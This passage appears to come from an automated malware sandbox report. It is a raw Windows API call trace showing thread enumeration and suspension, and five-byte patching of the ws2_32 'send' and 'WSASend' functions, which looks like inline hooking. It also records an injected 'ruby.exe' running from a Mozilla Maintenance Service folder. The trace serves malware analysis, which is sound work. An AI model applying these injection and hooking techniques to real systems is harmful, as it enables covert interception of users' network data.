(hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.834] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.835] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.835] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.835] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.836] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.836] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.836] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.836] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.837] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.837] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.837] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.838] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.838] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.838] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.839] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.839] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.839] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.839] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.840] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.840] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.861] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x7b0) returned 0x8c [0170.861] SuspendThread (hThread=0x8c) returned 0x0 [0170.861] CloseHandle (hObject=0x8c) returned 1 [0170.862] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9b4) returned 0x8c [0170.862] SuspendThread (hThread=0x8c) returned 0x0 [0170.862] CloseHandle (hObject=0x8c) returned 1 [0170.886] CloseHandle (hObject=0x88) returned 1 [0170.886] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x75bc0000 [0170.886] GetProcAddress (hModule=0x75bc0000, lpProcName="send") returned 0x75bc6f01 [0170.886] VirtualProtect (in: lpAddress=0x75bc6f01, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x74224 | out: lpflOldProtect=0x74224*=0x20) returned 1 [0170.887] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x40) returned 0x80000 [0170.887] RtlMoveMemory (in: Destination=0x80000, Source=0x75bc6f01, Length=0x5 | out: Destination=0x80000) [0170.887] VirtualProtect (in: lpAddress=0x75bc6f01, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x74224 | out: lpflOldProtect=0x74224*=0x40) returned 1 [0170.894] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x75bc0000 [0170.894] GetProcAddress (hModule=0x75bc0000, lpProcName="WSASend") returned 0x75bc4406 [0170.894] VirtualProtect (in: lpAddress=0x75bc4406, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x74224 | out: lpflOldProtect=0x74224*=0x20) returned 1 [0170.894] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x40) returned 0xa0000 [0170.894] RtlMoveMemory (in: Destination=0xa0000, Source=0x75bc4406, Length=0x5 | out: Destination=0xa0000) [0170.894] VirtualProtect (in: lpAddress=0x75bc4406, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x74224 | out: lpflOldProtect=0x74224*=0x40) returned 1 [0170.900] GetCurrentProcessId () returned 0x7a4 [0170.900] GetCurrentThreadId () returned 0x5e8 [0170.900] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x88 [0170.902] Thread32First (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.902] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.902] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.903] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.903] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.903] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.903] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.904] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.904] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.904] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.905] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.905] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.905] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.905] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.906] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.906] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.906] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.906] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.907] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.907] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.907] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.908] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.908] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.908] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.908] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.909] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.909] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.909] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.909] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.910] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.910] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.910] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.911] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.911] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.911] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.911] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.912] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.912] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.912] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.912] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.913] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.913] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.913] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.914] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.914] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.914] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.914] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.915] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.915] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.915] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.915] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.916] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.916] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.916] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.917] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.917] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.917] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.917] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.918] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.918] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.918] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.918] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.919] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.919] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.919] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.920] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.920] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.920] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.920] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.921] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.921] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.921] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.921] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.922] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.922] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.922] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.923] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.923] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.923] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.923] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.924] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.924] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.924] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.925] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.925] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.925] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.925] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.926] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.926] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.926] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.926] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.927] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.927] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.927] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.928] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.928] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.928] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.928] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.929] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.929] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.929] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.929] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.930] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.930] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.930] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.931] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.931] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.931] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.931] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.932] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.932] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.932] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.932] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.933] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.933] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.933] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.934] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.934] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.934] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.934] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.935] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.935] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.935] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.935] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.936] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.936] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.936] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.936] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.937] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.937] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.937] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.964] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.964] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.965] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.965] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.965] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.966] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.967] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.967] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.967] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.968] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.968] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.968] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.968] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.969] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.969] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.969] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.970] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.970] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.970] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.971] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.971] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.971] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.971] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.972] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.972] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.972] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.972] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.973] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.973] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.973] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.974] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.974] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.974] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.974] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.975] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.975] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.975] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.976] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.976] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.976] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.976] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.977] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.977] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.977] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.977] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.978] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.978] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.978] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.979] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.979] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.979] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.979] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.980] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.980] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.980] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.980] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.981] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.981] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.981] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.982] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.982] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.982] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.982] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.983] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.983] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.983] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.984] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.984] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.984] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.984] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.985] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.985] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.985] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.986] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.986] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.986] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.986] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.987] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.987] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.987] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.988] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.988] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.988] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.988] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.989] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.989] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.989] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.989] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.990] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.990] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.990] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.991] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.991] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.991] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.991] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.992] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.992] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.992] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.992] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.993] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.993] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.993] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.994] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.994] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.994] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.994] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.995] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.995] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.995] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.995] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.996] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.996] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.996] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.997] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.997] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.997] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.997] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.998] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.998] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0171.014] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x7b0) returned 0x8c [0171.015] ResumeThread (hThread=0x8c) returned 0x1 [0171.015] CloseHandle (hObject=0x8c) returned 1 [0171.015] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9b4) returned 0x8c [0171.015] ResumeThread (hThread=0x8c) returned 0x1 [0171.015] CloseHandle (hObject=0x8c) returned 1 [0171.039] CloseHandle (hObject=0x88) returned 1 [0171.039] VirtualQuery (in: lpAddress=0x6e09e8, lpBuffer=0x1fff8a8, dwLength=0x1c | out: lpBuffer=0x1fff8a8*(BaseAddress=0x6e0000, AllocationBase=0x6c0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0171.039] GetProcessHeap () returned 0x6c0000 [0171.039] HeapFree (in: hHeap=0x6c0000, dwFlags=0x0, lpMem=0x6e09e8 | out: hHeap=0x6c0000) returned 1 [0171.040] VirtualQuery (in: lpAddress=0x6e08d8, lpBuffer=0x1fff8a8, dwLength=0x1c | out: lpBuffer=0x1fff8a8*(BaseAddress=0x6e0000, AllocationBase=0x6c0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0171.040] GetProcessHeap () returned 0x6c0000 [0171.040] HeapFree (in: hHeap=0x6c0000, dwFlags=0x0, lpMem=0x6e08d8 | out: hHeap=0x6c0000) returned 1 [0171.040] RtlExitUserThread (Status=0x0) Process: id = "31" image_name = "ruby.exe" filename = "c:\\program files (x86)\\mozilla maintenance service\\ruby.exe" page_root = "0x67219000" os_pid = "0x688" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "16" os_parent_pid = "0x958" cmd_line = "\"C:\\Program Files (x86)\\Mozilla Maintenance Service\\ruby.exe\" " cur_dir = "C:\\Program Files (x86)\\Mozilla Maintenance Service\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 255 os_tid = 0x9b0 Thread: id = 256 os_tid = 0x734 Thread: id = 257 os_tid = 0xafc [0170.568] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76c20000 [0170.568] GetProcAddress (hModule=0x76c20000, lpProcName="Sleep") returned 0x76c310ff [0170.568] GetProcAddress (hModule=0x76c20000, lpProcName="ReadProcessMemory") returned 0x76c4cfcc [0170.569] GetProcAddress (hModule=0x76c20000, lpProcName="Thread32Next") returned 0x76cb5c3f [0170.569] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcatA") returned 0x76c52b7a [0170.569] GetProcAddress (hModule=0x76c20000, lpProcName="ExitThread") returned 0x7718d598 [0170.569] GetProcAddress (hModule=0x76c20000, lpProcName="MultiByteToWideChar") returned 0x76c3192e [0170.569] GetProcAddress (hModule=0x76c20000, lpProcName="RtlMoveMemory") returned 0x77193c40 [0170.569] GetProcAddress (hModule=0x76c20000, lpProcName="GetLastError") returned 0x76c311c0 [0170.569] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcmpiA") returned 0x76c33e8e [0170.569] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0170.569] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualAlloc") returned 0x76c31856 [0170.569] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryA") returned 0x76c349d7 [0170.569] GetProcAddress (hModule=0x76c20000, lpProcName="OpenThread") returned 0x76c41248 [0170.569] GetProcAddress (hModule=0x76c20000, lpProcName="Process32Next") returned 0x76c588a4 [0170.570] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleFileNameA") returned 0x76c314b1 [0170.570] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleHandleA") returned 0x76c31245 [0170.570] GetProcAddress (hModule=0x76c20000, lpProcName="CreateMutexA") returned 0x76c34c6b [0170.570] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f [0170.570] GetProcAddress (hModule=0x76c20000, lpProcName="CreateToolhelp32Snapshot") returned 0x76c5735f [0170.570] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentThreadId") returned 0x76c31450 [0170.570] GetProcAddress (hModule=0x76c20000, lpProcName="CloseHandle") returned 0x76c31410 [0170.570] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcessId") returned 0x76c311f8 